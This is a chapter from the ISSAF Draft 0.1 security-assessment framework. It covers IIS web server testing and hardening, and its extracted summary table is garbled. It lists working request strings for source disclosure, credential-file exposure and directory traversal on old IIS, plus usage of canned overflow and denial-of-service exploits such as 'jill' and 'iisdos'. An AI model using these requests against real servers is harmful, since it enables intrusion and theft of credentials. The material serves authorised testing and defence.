R WEB APPLICATION SECURITY (CONTINUE) WEB

SERVER SECURITY ASSESSMENT

A.1 MICROSOFT INTERNET INFORMATION SERVER
Description
Microsoft Internet Information Server has a big history of vulnerabilities. As per it's nature
till IIS version 5.0 it provides various services by default. They have fairly limited this in
IIS version 6.0. IIS security testing can be divided into three major categories. 1.
Information Disclosure 2. Buffer Overflow and 3. File System Traversal.
Microsoft has provided service packs from time to time and an attacker take advantage
of lack of patch implication. Most of the time people put service packs but they miss hot
fixes.
Other important aspect to consider while testing security of IIS is firewall. Several time
you may get vulnerability and related proof of concept tool but it may be blocked on
firewall because you may not get required port opened.

A.1.1 Summary
Extentio
n
.asp

Requirement
ASP

Vulnerability

and HTTP

Reference
related Buffer Overflows:

functionality

GET Expected

Pre

Request

Response

requisite

200 OK

default.as

Search
www.Microsoft.com

.htr

.idc

To

MS02-018
reset Reveals source code

password from Search

default.asp+.ht

Internet

www.Microsoft.com

Internet

MS01-04
Reveals directory path

/null.idc

Database

Search

Connector

www.Microsoft.com

500 error

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

.stm,

Server

.shtm,

Include

Q193689
Side Remote Buffer overflow
Search

.shtml

/<file>.stm,

200 OK

Requeste

.shtm, .shtml

www.Microsoft.com

.printer

Printing

MS01-044
from Remote Buffer overflow

Internet

file

must

be

present
/null.printer

Search

500 Internal
Server Error

www.Microsoft.com
.htw

Highlight

MS01-023
text Reveals source code

in web page

/null.htw

200 OK

Index

Search

"The

format Server

www.Microsoft.com

of

MS00-006

QUERY_ST
RING

.ida, .idq

Index Server

Remote Buffer overflow

/null.ida,

invalid"
200 OK

Search

/null.idq

"The

www.Microsoft.com

file

MS01-033

not

is
Index
IDQ Server
could
be

FrontPa

FrontPage

Remote Buffer overflow

/_vti_bin

found."
501

ge

Server

Search

/_vti_aut

Implemented

Server

Extention

www.Microsoft.com

/fp30reg.dll

Extentio

Not Front
Page
Server

MS01-035

Extention

2000
Visual
studio
RAD

Web

Remote

Web

DAV

DAV

remote root exploit.

attempting to

Remote

www.k-otik.com

join shell ...

Web

Remote DoS attack

Server

DAV

www.microsoft.com/tech

DoSsed!

Remote

net/treeview/default.asp

Now run !! F- shall

DoS

B-eyee

Successful,

Exploit

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 2 of 12

is Method
search
be

is allowed.

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

Attack.

url=/technet/security/bull

after j00...

etin/MS03-018.asp
The exploit is available
at
www.k-otik.com

A.1.2 Information Disclouser

A.1.2.1 ASP ::$DATA BUG
It occures because of an error in the way IIS parses files. A tricker request allows to
dispaly content of server side files. Type http://www.target.com/default.asp::$DATA in
your browser, it will display the source code of default.asp file in your browser.
Pre Requsite:
1. IIS Version below 3.0
2. File has to be in NTFS partition and should have read access

A.1.2.2 ASP DOT BUG

Displays asp source code of by appending one or more dot to the end of URL.
http://www.target.com/products.asp.
In the end of obove url an extra dot is added. IIS would not be able to handle this
request well and it will reveal source code.
Pre Requesites:
1. Till IIS 3.0
2. Read access to desired resource.

A.1.2.3 +.HTR BUG

Reveals the source code by giving +.htr in the end of request.
http://www.target.com/abc.asp+.htr
Pre Requsite:
1. IIS 4.0 pre Windows NT 4.0 Service Pack 6a Security Rollup Package (SRP)
2. IIS 5.0 till SP2 pre Windows 2000 Security Rollup Package 1

A.1.2.4 .IDC, .IDA AND .IDQ BUGS

Similar to .asp bug. This time you will get directory path of IIS instead of source code.
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 3 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

http://www.target.com/abc.idc
This results in full path and can be used to find out further holes.
C:\inetpub\wwwroot\abc.idc not found
http://www.target.com/def.idq
http://www.target.com/ghi.ida
Pre Requsites:
IIS 5.0 without any service pack.
or anything.idq
you will get the path.

A.1.2.5 ISM.DLL BUFFER TRUNCATION

Displays source code of the scripts and the contents of the files by appending space in
hexadecimal and .htr to url.
http://www.target.com/global.asa%20%20(...<=230)global.asa.htr
It reveals the source code of global.asa
Prerequisites: IIS4.0 and 5.0

A.1.2.6 NT SITE SERVER ADSAMPLES BUG

Displays site.csc which contains DSN, UID, PASSWORD etc..
http://www.target.com/adsamples/config/site.csc
Prerequsites:

A.1.2.7 TRANSLATE:F BUG

If some one makes a request for ASP/ASA or anyother scriptable page and adds
translate:f into headers of HTTP GET , then they are come up with complete ASP/ASA
source code.
Pre Requisite: Win2k with SP1 not installed

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 4 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

A.1.2.8

NULL.HTW

This vulnerability can give the souce code of server side ASP page. The ASP page could
give the valuable information like username and password.
http://www.target.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none
%20&%20&CiHiliteType=full
CiWebhitsfile, CiRestriction, CiHiliteType are the three variables of null.htw. Null.htw
takes input from user on these three varibales. In result you will get source code of
default.asp file.
Prerequsites:
1. Index Server
2. null.htw

A.1.2.9

WEBHITS.DLL

& .HTW BUG

Displays source code of ASP and other scripts.

http://www.target.com/nosuchfile.htw
If you get error "format of the QUERY_STRING is invalid" you are vulnerable
Prerequisite: control of the CiWebhitsfile
As the user has control of the CiWebhitsfile argument passed to the .htw file he can
request whatever he wants.
You can find the .htw files in the following locations of different iis web servers
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw

A.1.3 Bufferoverflow
A.1.3.1 WEBDAV REMOTE ROOT EXPLOIT

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 5 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

If IIS5.0 is unpatched, There is a lucky chance that a simple overflow will gain root to
attacker. The exploit written by Schizoprenic is available on www.k-otik.com . It's a
canned exploit again and if your exploits output gives you something like
Successful, attempting to join shell ...
That will means the server is vulnerable. Administrator's first priority shall be to apply
patch on the affected server.

A.1.3.2 WEB DAV

If TRACE method is enabled try Xwbf-v0.3.exe exploit. It works on Port 80 and requires
connection back from target. Hopefully you will find firewall is allowing even connections
from target (Web Server) to Public. This exploit provides root access.
Corporate firewall will not be allowing NetBIOS for Public access, if in case it's allowed
internally, SMBDie can be checked. It works after service Pack 3, hot fix for this is
available. It reboot's Windows 2000 machine.
.htr bufferoverflow against IIS 4.0 by eEye.

A.1.3.3 JILL
jill is written in UNIX C, can also be compile with using Cygwin for Windows 2000.
$ gcc -o jill jill.c
This binary can be run either from the Cygwin shell or from a Win32 console if
cygwin1.dll is in the path.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <targetHost> <targetPort> <attackerHost> <attackerPort>

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 6 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

A.1.3.4 SECHOLE REMOTE EXPLOIT

A.1.3.5 FRONT PAGE 2000 EXTWNSIONS
Buffer overflow in the Front Page 2000 Server Extensions(FPSE 2000), a set of three
programs that support features such as collaborative authoring, hit counters, email formhandling, and editing a Web site directly on a server .
Prequisites:
1. Front Page Server Extention 2000
2. Visual studio RAD
When you install the Front Page Server Extention 2000 fp30reg.dll and fp4areg.dll are
installed by default
When either of these DLLs receives a URL request longer than 258 bytes, a buffer
overflow occurs.
Once an attacker finds that a server is having these dll's, he can use the exploit
"fpse2000ex.exe."

A.1.4 DoS
As pointed out by SPI Dynamics, the vulnerability in IIS 5.0 and IIS 5.1 can lead to
Denial of Service. Worse part is it will be remote and causes the server to restart. The
proof of concept exploit is available at www.k-otik.com . It's a canned exploit so not use it
on your production server. The exploit work as below
#./iisdos
Usage : <I.P./Hostname>
#./iisdos 172.16.169.17
Server is DoSsed! Now run !! F-B-eyee is after j00...
This shows that my server 172.16.169.17 is vulnerable and needs to be patched.

A.1.5 File system traversal

A.1.5.1 UNICODE FILE SYSTEM TRAVERSAL
Unicode representations of "/" and "\" are %c0%af" and "%c1%9c" respectively. There
might even be longer (3+ byte) overlong representations. IIS decodes the UNICODE
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 7 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

after path checking rather than before. In this unicode representation , it is possible to
use "../" to backup and into the sytem directory and feed the input to the command shell.

A.1.5.2 DOUBLE DECODE FILE SYETEM TRANSFER

Doubly encoded hexadecimal characters also allowed HTTP requests to be constructed
that escaped thenormal IIS security checks and permitted access to resources outside of
the Webroot.
The % character is represented by %25. Thus, the string %255c, if decoded sequentially
two times in sequence, translates to a single backslash. Here we require two decodes
and IIS thus perform two decodes on the HTTP requests that traverse the executable
directories.

A.2 REFRENCE
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0029.html

A.3 INTERNET INFORMATION SYSTEM (IIS) SECURITY CHECKLIST

By Hernn Marcelo Racciatti, Hernan@oissg.org, Coordinator Open Information System
Security Group, Argentina
The steps shown next, are oriented to secure a server running IIS, disconnected of
domain enviroment, commonly an Bastion Host located in portion DMZ of a corporative
network, running the services of IIS.

A.3.1 Steps to Secure:

Step
Consider the security of the environment.

Notes:
DMZ, Networking, border router,
networking, app server, database

Implementing the hardening operating system

server, etc.
Use checklist

and apply all the pertinent revisions of security.

software provider.

and

tools

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 8 of 12

from

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

Remove the components that are not necessary.

Eg.Unused

IIS

ISAPI

DLLs

unmapped. Remove sample web

content/applications.
q

Account running HTTP service should be low

q
q
q
q
q

privileged.
Enable Only Essential Web Service Extensions.
Place Content on a Dedicated Disk Volume.
Without administrative utilities!!
Configure NTFS permissions.
Configure IIS Web Site permissions.
Configure IIS logging. Preferably, in W3C

format.
Configure

mechanisms for relevant directories.

Implement Secure Sockets Layer (SSL) and

q
q
q

certificate server.
Install and configure a virus protection solution.
Install and configure IDS from HOST.
Secure well-known accounts.

appropriate

authentication

Rename the built-in Administrator

account,

assign

complex

password. Ensure Guest account

is

disabled.

Change

account description.
Execute the applications with protection of IIS 6.0

q
q
q
q

applications medium or high.

Secure services accounts.
Implementing security in depth (IPSec Filters).
Implementing IISLockdown and URLScan.
Implementing an assessment policy.

default

IIS 4.0/5.0

A.3.2 References
Hardening IIS 5.0
http://www.shebeen.com/w2k
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/deploy/
depovg/securiis.mspx
http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/tips/iis5
chk.mspx
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 9 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

Hardening IIS 6.0

http://www.microsoft.com/technet/Security/prodtech/win2003/w2003hg/sgch08.mspx

A.4 APACHE SECURITY ASSESSMENT

A.5 GLOBAL COUNTERMEASURES

Secure administrative access

Limit Webserver access to administrators and allow access through secure
authentication mechanisms. In remote management scenarios IP addresses
allowed to administer the Webserver should be clearly defined and the
administrative processes restricted to these specific IP addresses. Adminisrative
access should make use of a secure capability such as secure shell(ssh) or VPN

Harden web-server
o

Web-server hosts should have non-essential services disabled

Configure syn cookie at OS level to protect against SYN flood attacks

Web-server hosts must be updated with the latest security fixes for the
operating system and web server software

Web-server hosts should have minimum number of accounts in the

system

Remove all non-essential files such as phf from the scripts directory /cgibin.

Remove all sample directories and pages that are shipped with web
servers

Disable directory browsing especially on folders containing scripts or

executables

Do not assign write and script/execute permissions to same folder

Disable anonymous access for FTP service

Remove unused script mappings

Secure change control procedures

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 10 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

Any change on Web-server including web page updation, patch

application and hardware replacement should be documented and
authorized.

There should be procedures to continuously track and rectify new security

issues on the deployed Webserver.

Website updation procedures must be clearly defined. Do all updates

from the Intranet. Maintain web page originals on a server in the Intranet
and make all changes and updates here; then "push" these updates to
the public server through an SSL connection

Enable logging and do periodic analysis

Log all user activity and monitor the logs. Conduct periodic analysis of system
logs to detect suspicious activity.

Audit Web server periodically

Conduct periodic security audits to assess the strength of the Webserver. Audit
can be manual verification against a pre-defined checklist or it can also be
automated by tools. Periodic penetration testing of website also adds meaningful
insights on the vulnerabilities of the web server.

Run webserver in a chroot jail

o

The damage that a successful attacker can inflict can be further limited by
running web server in a chroot-ed environment. The Unix chroot system
call changes the root directory of a process, such that the process can
then no longer access any of the files above the specified root directory in
the filesystem heirarchy. All web pages and configuration files need to be
in the chroot directory.

Run FTP server in a separate chrooted part of the directory tree that is
different from that of the web server

For Windows platform limit the top level root directory to an isolated
directory structure with strict permissions configured

Compartmentalize web server process

o

Use of safe application environments in the lines of Trusted Operating

Systems are recommended for isolating the web server process from

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 11 of 12

Information Systems Security Assessment Framework (ISSAF) Draft 0.1

other system processes. This will contain attacks and prevent damage
to web servers.

Run web server as a non-root user

o

Web servers are susceptible to root compromise using buffer overflow

attacks when web server daemon is run as root. It is safer to run web
server as a non-root user to minimize damages from the attack

Implement Web server load balancing

o

Mission critical web sites should have multiple servers on to which the
load is distributed. This will make it difficult to hog the performance of the
server, thereby reducing the chances for performance based denial of
service attacks. It also adds redundancy

2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)

Date: 11/16/2016
Page 12 of 12